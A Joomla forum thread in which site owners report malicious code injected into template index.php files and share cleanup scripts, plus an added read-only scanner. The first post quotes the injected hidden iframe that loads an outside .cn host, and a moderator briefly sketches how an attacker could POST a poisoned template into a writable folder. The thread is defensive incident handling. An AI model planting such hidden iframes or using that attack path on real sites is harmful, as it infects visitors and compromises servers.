Code Injection in the index.php
Moderator: General Support Moderators
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
-
- Joomla! Fledgling
- Posts: 2
- Joined: Fri Jul 14, 2006 12:59 pm
Code Injection in the index.php
Hi Folks
Today I have seen this code after the <body> tags "<iframe src="http://xmanages.cn/in" width=1 height=1 style="visibility: hidden"></iframe>" in the files of
Public_html/index.php
Public_html/templates/all of templates/index.php
Public_html/administrator/index.php
Public_html/administrator/templates/joomla_admin/index.php
How did they inject it? Have you ever seen such malware code? Is there anyone who can help me with this trouble?
Have a nice day.
- dhuelsmann
- Joomla! Master
- Posts: 19659
- Joined: Sun Oct 02, 2005 12:50 am
- Location: Omaha, NE
- Contact:
Re: Code Injection in the index.php
I suggest you start here http://docs.joomla.org/Joomla_Administr ... _Checklist
and then here http://forum.joomla.org/viewtopic.php?f=267&t=112604
Regards, Dave
Past Treasurer Open Source Matters, Inc.
Past Global Moderator
http://www.kiwaniswest.org
-
- Joomla! Apprentice
- Posts: 31
- Joined: Fri Dec 23, 2005 1:30 am
Re: Code Injection in the index.php
There is a major hack going down, inserting code snippets into the joomla template index files. All my sites have been compromised, first time in 4 years.
The code snip I am finding is the hu1-hu1.cn hack. I think they are getting in through the php engine. Bad.
-
- Joomla! Intern
- Posts: 57
- Joined: Thu Mar 02, 2006 8:09 am
Re: Code Injection in the index.php
I have run into the same thing. Anyone figured out how they're doing it yet? I'm working on just removing the crap from my php, html and htm files. Will let you know if I find a pleasant way of doing it without disturbing all the files too much.
- mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: Code Injection in the index.php
here is my thinking on how I would do it,
.try and POST to the 777 permissions template folder a pre injected version of the template
.move on to the next place.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
-
- Joomla! Intern
- Posts: 57
- Joined: Thu Mar 02, 2006 8:09 am
Re: Code Injection in the index.php
Sorry, I'd fixed my stuff but hadn't given back.
Here's some code I sniped from another forum and then modified to suit me.
Code:
<?php
// 23/8/2008 <unknown name yet> exploit clean
// Written by [email protected] and modified to please stackedsax
// Get all files under the 'public_html' directory -- change accordingly
$command = shell_exec('find public_html -iname "*.php" -o -iname "*.html" -o -iname "*.htm" -o -iname "*.tpl"');
$lines = explode("\n", $command);
array_pop($lines); // Just to get rid of the final \n...
foreach ($lines as $line)
{
    // Get current contents of file
    $contents = file_get_contents($line);
    if ($contents === false) {
        continue; // Unreadable file: leave it alone
    }
    // Clean exploit code
    // print "Cleaning file: $line\n";
    $pattern = '|<html> <body><script>var source ="=jgs.*\ndocument.write.*</script>\s*\n\s*</html> </body>|ms';
    $clean_contents = preg_replace($pattern, '', $contents);
    if ($clean_contents === null) {
        continue; // Regex error (e.g. backtrack limit): do not overwrite the file with nothing
    }
    $clean_contents = str_replace("</html> </body>", "</html>", $clean_contents);
    // Write cleaned contents, only when something actually changed
    if ($clean_contents !== $contents) {
        $file = fopen($line, 'w'); // The mode must be a quoted string
        fwrite($file, $clean_contents);
        fclose($file);
    }
}
?>
Save the code as a php file like 'cleanThatCrap.php' and run at the command line:
Code:
> php cleanThatCrap.php
Of course, you should back up your hacked files before you blindly run my code....
I think I could have done it a line or two quicker, but by the time I thought about it, I'd cleaned my files, so I never got to refining it any further. For instance, I think the only replacement you need is actually something more like:
Code:
$pattern = '|<html> <body><script>var source ="=jgs.*</body>|ms';
I was just being overly specific and as a consequence need a str_replace in there too...
Whatever works for you guys.
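A companion to the cleanup script above, added here as an example and not part of the original posts: a read-only scan that reports hidden iframes like the one in the first post (1x1 size or visibility: hidden) without rewriting any file, so the hits can be reviewed and backed up before cleaning. It walks the tree with PHP's own iterators instead of shell_exec; the function names, the sample HTML and the example.invalid host are assumptions made for illustration.

```php
<?php
// Read-only scan for hidden iframes (added example, not the poster's code).

/** Return [line number, tag] for every hidden <iframe> tag in $html. */
function find_hidden_iframes(string $html): array
{
    $hits = [];
    preg_match_all('/<iframe\b[^>]*>/i', $html, $m, PREG_OFFSET_CAPTURE);
    foreach ($m[0] ?? [] as [$tag, $offset]) {
        // Hidden means a 0 or 1 pixel width/height, or CSS that hides the frame.
        $tiny   = preg_match('/\b(?:width|height)\s*=\s*["\']?[01](?:px)?["\']?(?=[\s>\/])/i', $tag);
        $hidden = preg_match('/visibility\s*:\s*hidden|display\s*:\s*none/i', $tag);
        if ($tiny || $hidden) {
            $hits[] = [substr_count(substr($html, 0, $offset), "\n") + 1, $tag];
        }
    }
    return $hits;
}

/** Walk $root and list hidden iframes in web files. Nothing is modified. */
function scan_tree(string $root): array
{
    $report = [];
    $walker = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
    foreach ($walker as $file) {
        if (!$file->isFile() || !preg_match('/\.(?:php|html?|tpl)$/i', $file->getFilename())) {
            continue;
        }
        $html = @file_get_contents($file->getPathname());
        if ($html === false) {
            continue; // Unreadable: skip rather than guess
        }
        foreach (find_hidden_iframes($html) as [$line, $tag]) {
            $report[] = sprintf('%s:%d: %s', $file->getPathname(), $line, $tag);
        }
    }
    return $report;
}

// Constructed sample: one hidden frame shaped like the reported one, one normal frame.
$sample = "<body>\n<iframe src=\"http://example.invalid/in\" width=1 height=1 "
        . "style=\"visibility: hidden\"></iframe>\n<iframe src=\"/map.html\" width=\"600\"></iframe>";
foreach (find_hidden_iframes($sample) as [$line, $tag]) {
    echo "sample line $line: $tag\n";
}
// Usage: php scan.php public_html
if (isset($argv[1])) {
    echo implode("\n", scan_tree($argv[1])), "\n";
}
```

On the constructed sample only the frame on line 2 is reported; the 600-pixel frame on line 3 is left out.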
-
- Joomla! Apprentice
- Posts: 31
- Joined: Fri Dec 23, 2005 1:30 am
Re: Code Injection in the index.php
It appears that the code snippet was part of a much more sophisticated exploit that infected many servers from the server farm I lease from, and has nothing specifically to do with Joomla. I believe the compromise was at the administrative level of the server farm; they may have got the root passwords. I don't think there was any way to defend against it on the code level.
I was able to clean up about 40,000 files on my server with a combination of scripts and PowerGREP. I described the problem to one of my consultants and he immediately knew the server farm name without my telling him, so that was the smoking gun. When I finally got the farm techs to fill me in on the scale of the compromise, it was clear that just cleaning the snippets was the least of my problems. The list of exploits was pages long and quite sophisticated. The server was so fully compromised that I would never be confident of it again. So I bit the bullet and reloaded the server, doing 2 years of work in 48 hours. Having the old drive slaved to the new one helped; I will reformat as soon as possible.
-
- Joomla! Intern
- Posts: 57
- Joined: Thu Mar 02, 2006 8:09 am
Re: Code Injection in the index.php
Yes, you are correct, from what I've read elsewhere, people were claiming that this was part of a root attack. The code I posted is only to clean the affected files so that your websites might work.
In the meantime, other evasive action is certainly required... backup, move to a more hardened server, change passwords.... all the usual.
-
- Joomla! Fledgling
- Posts: 2
- Joined: Thu Mar 26, 2009 8:05 am
Re: Code Injection in the index.php
just change the permissions of file .htaccess to read only and also of the front index.php+ index.html files to read only.....
- mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: Code Injection in the index.php
vikki237 wrote: just change the permissions of file .htaccess to read only and also of the front index.php+ index.html files to read only.....
Without knowing what actually happened, this information is a bit too vague.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
-
- Joomla! Apprentice
- Posts: 28
- Joined: Fri Jan 11, 2008 7:25 am
- Location: Tamilnadu,India
- Contact:
Re: Code Injection in the index.php
I host my site on a hosting server, so shell access is not possible. Is it possible to run recursively on all folders' PHP files and clean some base64 code injection from my PHP files?
Help me
Thanks in advance